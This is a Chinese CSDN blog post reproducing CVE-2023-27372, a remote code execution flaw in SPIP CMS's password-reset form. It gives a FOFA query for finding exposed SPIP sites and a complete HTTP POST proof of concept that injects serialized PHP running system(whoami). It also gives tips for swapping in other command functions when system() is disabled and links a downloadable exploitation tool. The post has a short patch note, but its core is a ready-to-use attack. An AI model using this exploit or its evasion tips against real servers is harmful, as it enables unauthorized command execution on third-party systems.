SPIP远程代码执行漏洞(CVE-2023-27372)

最新推荐文章于 2024-08-28 15:57:34 发布
最新推荐文章于 2024-08-28 15:57:34 发布
阅读量2.2k 收藏 2
点赞数 1
分类专栏: 网络安全漏洞复现 文章标签: 网络安全 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/holyxp/article/details/131724785
版权
文章详细介绍了SPIPCMS的一个严重漏洞,该漏洞存在于4.2.1之前的版本中,允许攻击者通过未过滤的序列化字符串在密码重置功能中执行远程代码。影响版本为SPIP<4.2.1。修复建议是更新到最新补丁版本4.2.2,以解决此安全问题。
摘要由CSDN通过智能技术生成

SPIP远程代码执行漏洞【CVE-2023-27372】

一、漏洞描述

SPIP Cms v4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当。

二、漏洞分析

漏洞存在与密码重置功能中(漏洞点位url:/spip.php?page=spip_pass),重置密码时 protege_champ()函数没有对序列化字符串进行过滤,从而触发命令执行漏洞。

三、影响版本

SPIP < 4.2.1

**FOFA语句:**app=“SPIP”

四、漏洞复现

POC

POST /spip.php?page=spip_pass HTTP/1.1
Host:	
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
Connection: close
Upgrade-Insecure-Requests: 1

page=spip_pass&formulaire_action=oubli&formulaire_action_args=CSRF_TOKEN&oubli=s:19:"<?php system(whoami); ?>";&nobot=

在这里插入图片描述
Payload解释:s表示字符串格式,26表示Payload长度(冒号以内),如果禁用system(),可以使用shell_exec()、passthru()、proc_open()等等

1、注意看清目标是什么系统,不一定只是Linux

2、命令执行失败:(1)看一下禁用函数。(2)更换命令执行函数。(3)字符原因。(4)系统环境问题。

3、响应包搜索id='oubli’就是命令执行的结果。

小龙工具复现:

在这里插入图片描述

下载链接:https://pan.baidu.com/s/1kCG5D4PMwY5wKeR47yL6iA?pwd=6666
提取码:6666

五、修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://git.spip.net/spip/spip/src/tag/v4.2.2
安全攻防赵小龙
关注
专栏目录
SPIP porte_plume插件 远程代码执行漏洞复现(CVE-2024-7954)
0xSec
08-28 1400
SPIP 4.30-alpha2、4.2.13、4.1.16之前的版本使用的porte_plume插件存在任意代码执行漏洞远程未经身份验证的攻击者可以通过发送精心设计的HTTP 请求以SPIP用户身份执行任意PHP代码
SPIP存在远程代码执行漏洞CVE-2024-7954 附POC
最新发布
nnn2188185的博客
09-03 118
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发SPIP是SPIP开源的一个用于创建 Internet 站点的免费软件。
春秋云境CVE-2023-27372
m0_64432806的博客
03-16 734
SPIP cms V4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当,没有对序列化字符串进行过滤从而触发命令执行漏洞
远程代码执行漏洞
weixin_42610010的博客
01-02 665
远程代码执行漏洞是指在计算机系统上,攻击者可以通过网络连接远程执行指定的代码,甚至可以执行操作系统命令。这种漏洞通常存在于应用程序或服务器软件中,攻击者可以利用这种漏洞获取控制权并拥有对系统的完全访问权限。远程代码执行漏洞非常危险,可以造成严重的损害,包括数据泄露、恶意软件的传播、甚至系统完全失控。应该采取有效的措施来防范远程代码执行漏洞,包括使用最新的安全补丁、防火墙和其他安全措施。 ...
SPIP插件porte_plume PHP任意执行漏洞(CVE-2024-7954)
iSee857的博客
08-28 613
SPIP 4.30-alpha2、4.2.13、4.1.16之前的版本使用的porte_plume插件存在任意代码执行漏洞远程未经身份验证的攻击者可以通过发送精心设计的HTTP 请求以SPIP用户身份执行任意PHP代码。关闭互联网暴露面或接口设置访问权限。
有意思的CVE-2022-0337复现
蚁景网安学院
04-23 884
前两天在刷tw,看到了个比较有意思的一个CVE漏洞,价值奖励是10000美刀,比较好奇的是价值10000美刀的漏洞是什么样子的,漏洞利用就是需要在浏览器中进行用户交互才能触发该漏洞,但由于 Windows 的文件保存默认为接受,通过使用强制您按 ENTER 约 2 秒的技巧简单地泄漏数十个环境变量。
2023HW护网100+个漏洞poc
Yb528970805的博客
09-19 3451
20 . Metabase validate 远程命令执行漏洞CVE-2023-38646。13 . HiKVISION 综合安防管理平台 files 任意文件上传漏洞 POC。3 . Adobe ColdFusion 反序列化漏洞CVE-2023-29300。25 . Panabit iXCache网关RCE漏洞CVE-2023-38646。65 . 泛微E-Office9文件上传漏洞 CVE-2023-2523 POC。66 . 泛微E-Office9文件上传漏洞 CVE-2023-2648 POC。
Error系列-CVE CIS-2023系统漏洞处理方案集合
tangdou369098655的博客
06-06 6898
网络安全-CVE - CIS 漏洞分析以及解决
用友时空KSOA软件前台文件上传漏洞
holyxp的博客
08-01 721
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
VMware vCenter Server远程代码执行漏洞复现 CVE-2021-21972
热门推荐
Ms08067安全实验室
08-18 1万+
文章来源|MS08067安全实验室本文作者:Taoing(WEB高级攻防班讲师)0x00 漏洞描述CVE-2021-21972 vmware vcenter的一个未任意位置,然后执行web...
SQL Server 远程代码执行漏洞复现(cve-2020-0618)
weixin_45006525的博客
04-26 2492
SQL Server 远程代码执行漏洞复现(cve-2020-0618) 简介 SQL Server 是Microsoft 开发的一个关系数据库管理系统(RDBMS),是现在世界上广泛使用的数据库之一。 漏洞概述 低权限的攻击者向影响版本SQL Server的Reporting Services实例发送精心构造的请求,可利用此漏洞在报表服务器服务帐户的上下文中执行任意代码,即可实现getshell。 影响版本 SQL Server 2012 for 32-bit Systems Service Pack 4
小龙web漏洞扫描工具
12-06
小龙web漏洞扫描工具,可批量扫描,绝对无毒,拒绝黑软
[漏洞挖掘与防护] 01.漏洞利用之CVE-2019-0708复现及防御详解(含学习路线)
杨秀璋的专栏
07-10 783
这是作者新开的一个专栏——“漏洞挖掘与防护”。第一篇文章将详细介绍Windows远程桌面服务漏洞CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击,堪比WannaCry。希望对入门的同学有帮助。您的点赞、评论、收藏将是对我最大的支持,感恩安全路上一路前行,如果有写得不好的地方,可以联系我修改。基础性文章,希望对您有所帮助!
优卡特脸爱云一脸通智慧管理平台权限绕过漏洞复现【CVE-2023-6099】
holyxp的博客
11-20 899
脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。功能包括:系统管理中心、人员信息管理中心、设备管理中心、消费管理子系统、订餐管理子系统、水控管理子系统、电控管理子系统、考勤管理子系统、门禁通道管理子系统、会议签到管理子系统、访客管理子系统。
大华智慧园区综合管理平台RCE漏洞
holyxp的博客
07-17 2110
大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。​ 大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
CVE-2023-23752 Joomla未授权访问漏洞分析
murphysec的博客
02-23 1686
Joomla 在海外使用较多,是一套使用 PHP 和 MySQL 开发的开源、跨平台的内容管理系统(CMS)。 Joomla 4.0.0 至 4.2.7 版本中的 ApiRouter.php#parseApiRoute 在处理用户的 Get 请求时未对请求参数有效过滤,导致攻击者可向 Joomla 服务端点发送包含 public=true 参数的请求(如:/api/index.php/v1/config/application?public=true&key=value) 进行未授权访问。
CVE-2023-27363 FOXIT PDF READER与EDITOR任意代码执行漏洞复现
热爱学习,喜欢折腾!
05-21 1308
福昕软件注册于国家科技部批准建立的十二个国家火炬计划软件产业基地之一的福州软件园和北京中关村高科技园区。公司专注于电子文档技术的研究和开发,拥有一套完全自有知识产权的PDF核心技术实现,提供PDF从生成、编辑、加工、搜索、显示、打印等一整套处理流程的解决方案,是国内为数不多的面向全球市场的基础软件开发商之一。
探索技术新星:XiaoLongPOC —— 动态安全检测工具的革新
gitblog_00068的博客
04-01 372
探索技术新星:XiaoLongPOC —— 动态安全检测工具的革新 去发现同类优质开源项目:https://gitcode.com/ 项目简介 是一个由开发者 XiaoLong 创建的开源项目,旨在提供一种高效、易用的方式来进行动态安全漏洞检测。通过自动化和智能化的手段,它可以帮助安全研究人员和DevOps团队快速发现并修复网络安全问题,以保护网络环境免受潜在威胁。 技术分析 XiaoLongPO...
SPIP cms远程代码执行漏洞CVE-2023-27372
qq_23003811的博客
07-31 240
SPIP cms V4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当,没有对序列化字符串进行过滤从而触发命令执行漏洞。2、执行payload,修改system('nl /f*')达到任意命令执行。1、获取formulaire_action_args的值。
WinRAR远程代码执行漏洞CVE-2023-40477分析与缓解措施
资源摘要信息:"CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC" 知识点详细说明: 1. CVE-2023-40477简介 CVE-2023-40477是一个安全漏洞,它存在于流行的文件压缩软件WinRAR中。WinRAR是一个在个人电脑和服务器上...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全攻防赵小龙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值